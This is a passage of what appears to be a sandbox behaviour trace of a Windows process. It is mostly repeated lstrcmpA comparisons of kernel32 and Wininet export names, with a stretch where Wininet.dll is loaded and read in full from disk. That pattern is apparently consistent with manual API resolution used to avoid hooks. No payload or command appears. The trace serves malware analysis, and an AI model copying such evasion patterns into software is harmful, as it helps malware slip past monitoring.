lpString2="AddAtomW") returned 1 [0091.002] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0091.002] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0091.002] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0091.002] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0091.002] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0091.002] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0091.002] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0091.002] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0091.002] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0091.002] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0091.002] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0091.002] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0091.002] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0091.002] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0091.002] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0091.002] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0091.002] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0091.002] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0091.002] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0091.003] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0091.003] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0091.003] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0091.003] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0091.003] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0091.003] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0091.003] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0091.003] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0091.003] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0091.003] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0091.003] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0091.003] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0091.003] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0091.003] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0091.003] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0091.003] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0091.003] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0091.003] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0091.003] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0091.004] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0091.004] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0091.004] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0091.004] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0091.004] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0091.004] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0091.004] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0091.004] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0091.004] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0091.004] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0091.004] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0091.004] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0091.004] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0091.004] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0091.004] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0091.004] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0091.004] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0091.004] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0091.004] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0091.004] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0091.004] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0091.004] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0091.004] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0091.004] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0091.004] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0091.004] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0091.005] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0091.006] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0091.006] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0091.006] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0091.006] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0091.006] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0091.006] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0091.006] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0091.006] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0091.006] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0091.006] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0091.006] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0091.006] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0093.070] GetProcessHeap () returned 0x430000 [0093.070] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x45c5d0 | out: hHeap=0x430000) returned 1 [0093.070] GetProcessHeap () returned 0x430000 [0093.070] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449120 [0093.070] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0093.082] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0093.082] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0093.082] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0093.082] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0093.082] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0093.082] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0093.082] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0093.082] GetProcessHeap () returned 0x430000 [0093.082] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x286600) returned 0x411c040 [0093.090] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0093.090] ReadFile (in: hFile=0x140, lpBuffer=0x411c040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x411c040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0093.576] CloseHandle (hObject=0x140) returned 1 [0093.577] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0093.577] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0093.577] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0093.578] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0093.578] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0093.578] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0093.578] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0093.578] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0093.578] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0093.578] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0093.578] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0093.578] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0093.578] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0093.578] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0093.578] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0093.578] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0093.578] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0093.578] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0093.578] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0093.578] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0093.578] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0093.578] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0093.578] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0093.579] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0093.579] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0093.579] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0093.579] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0093.579] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0093.579] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0093.579] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0093.579] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0093.579] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0093.579] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0093.579] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0093.579] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0093.579] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0093.579] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0093.579] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0093.579] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0093.579] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0093.579] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0093.579] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0093.579] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0093.579] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0093.579] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0093.579] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0093.580] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0093.580] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0093.580] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0093.580] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0093.580] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0093.580] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0093.580] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0093.580] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0093.580] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0093.580] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0093.580] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0093.580] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0093.580] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0093.580] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0093.580] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0093.580] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0093.581] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0093.581] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0093.581] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0093.581] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0093.581] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0093.581] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0093.581] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0093.581] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0093.581] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0093.581] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0093.581] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0093.581] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0093.581] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0093.581] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0093.581] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0093.581] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0093.581] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0093.581] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0093.581] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0093.581] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0093.582] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0093.582] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0093.582] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0093.582] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0093.582] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0093.582] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0093.582] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0093.582] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0093.582] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0093.582] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0093.582] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0093.582] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0093.582] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0093.582] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0093.582] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0093.582] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0093.582] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0093.582] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0093.582] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0093.582] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0093.582] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0093.583] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0093.583] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0093.583] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0093.583] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0093.583] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0093.583] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0093.583] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0093.583] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0093.583] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0093.583] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0093.583] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0093.583] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0093.583] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0093.583] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0093.583] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0093.583] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0093.583] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0093.583] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0093.584] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0093.584] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0093.584] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0093.584] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0093.584] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0093.584] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0093.584] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0093.584] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0093.584] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0093.584] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0093.584] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0093.584] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0093.584] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0093.584] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0093.584] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0093.584] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0093.584] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0093.584] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0093.584] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0093.584] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0093.584] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0093.584] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0093.585] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0093.585] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0093.585] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0093.585] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0093.585] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0093.585] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0093.585] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 